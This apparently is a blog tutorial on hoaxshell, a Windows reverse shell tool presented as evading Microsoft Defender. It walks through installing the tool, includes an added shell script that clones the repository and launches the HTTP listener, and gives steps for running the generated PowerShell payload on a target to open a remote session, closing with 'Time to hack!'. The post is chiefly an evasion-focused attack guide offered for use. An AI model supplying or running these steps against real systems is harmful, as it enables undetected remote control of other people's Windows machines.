Greetings, everyone! In this post, I’ll be providing a concise guide to hoaxshell, a recently released Windows reverse shell by t3l3machus that, at the time of writing, is not flagged by Microsoft Defender. Let’s get started!
Setup
To install the dependencies for any project without leaving my system in disarray, I recommend setting up a Python virtual environment first. For this, you will need Git and Python3 installed. To make the venv module available on a Debian/Ubuntu machine, run: sudo apt install python3-venv.
Let’s create a virtual environment, clone the hoaxshell repository, and install the required Python packages with the commands below.
Verify that the install works by running hoaxshell with the help flag and confirming the help menu appears.
Is it possible to craft reverse shell payloads with Hoaxshell?
With hoaxshell installed, we can generate Windows reverse shell payloads that Defender does not currently flag. To produce a standard reverse shell payload and start the HTTP listener (default port 8080), run the command below.
This is what your terminal should display:
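As an added example (not code from the original post or from the hoaxshell project), the following script covers both the setup steps above and starting the listener: it creates the virtual environment, clones the repository, installs the requirements, checks that the help menu comes up, and then launches the HTTP listener on the default port. The repository URL, the requirements.txt filename and the -s/-p flags are assumptions; confirm them against the project README and the output of hoaxshell.py -h.

```shell
#!/bin/sh
# Added example, not from the original post or the hoaxshell project.
# Assumptions: repo at https://github.com/t3l3machus/hoaxshell, dependencies
# listed in requirements.txt, and -s <ip> / -p <port> flags (check hoaxshell.py -h).
set -eu

HOAXSHELL_REPO="${HOAXSHELL_REPO:-https://github.com/t3l3machus/hoaxshell}"

# Path of the interpreter inside a venv rooted at $1 (pure helper, no side effects).
venv_python() {
    printf '%s/venv/bin/python3\n' "$1"
}

# True if the named tool is on PATH; used to fail early with a clear message.
need_cmd() {
    command -v "$1" >/dev/null 2>&1
}

# Step 1: venv + clone + pip install, all inside $1 so the host stays clean.
# Step 2: confirm the install by asking for the help menu.
hoaxshell_setup() {
    dir="$1"
    need_cmd git || { echo "git is required" >&2; return 1; }
    need_cmd python3 || { echo "python3 is required" >&2; return 1; }
    mkdir -p "$dir"
    python3 -m venv "$dir/venv"            # needs python3-venv on Debian/Ubuntu
    [ -d "$dir/hoaxshell" ] || git clone "$HOAXSHELL_REPO" "$dir/hoaxshell"
    "$(venv_python "$dir")" -m pip install -r "$dir/hoaxshell/requirements.txt"
    "$(venv_python "$dir")" "$dir/hoaxshell/hoaxshell.py" -h >/dev/null
}

# Step 3: start the HTTP listener and print the payload. The target must be able
# to reach $2:$3 over HTTP; 8080 is the default port mentioned in the post.
hoaxshell_listen() {
    dir="$1"; ip="$2"; port="${3:-8080}"
    "$(venv_python "$dir")" "$dir/hoaxshell/hoaxshell.py" -s "$ip" -p "$port"
}

# Usage: sh setup_hoaxshell.sh ~/tools 10.10.14.5 [8080]
if [ $# -ge 2 ]; then
    hoaxshell_setup "$1"
    hoaxshell_listen "$1" "$2" "${3:-8080}"
fi
```

Run it with the attacker-side IP the target can reach; the listener stays in the foreground and prints the payload once it is up.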
On the Windows target, you need to run the PowerShell command hoaxshell generated in order to get the reverse shell. To see exactly what that command does before running it, type ‘raw payload’ at the hoaxshell prompt and press Enter.
Within a PowerShell terminal window on the target Windows machine, copy and run the PowerShell payload.
Assuming no errors were thrown, you should have received a callback on your attacking machine. Hoaxshell confirms the payload was valid and you now have a working session; most importantly, Microsoft Defender does not flag the activity for the time being (which is awesome). Expect that to change as Defender’s signatures and behavioural detections are updated, so re-test before relying on it in an engagement.
Hoaxshell also supports encrypted transport, reconnecting dropped sessions, and tunnelling traffic through Ngrok or LocalTunnel. Explore those features on your own! There you have it: a reverse shell that currently slips past Defender on Windows 11. Time to hack!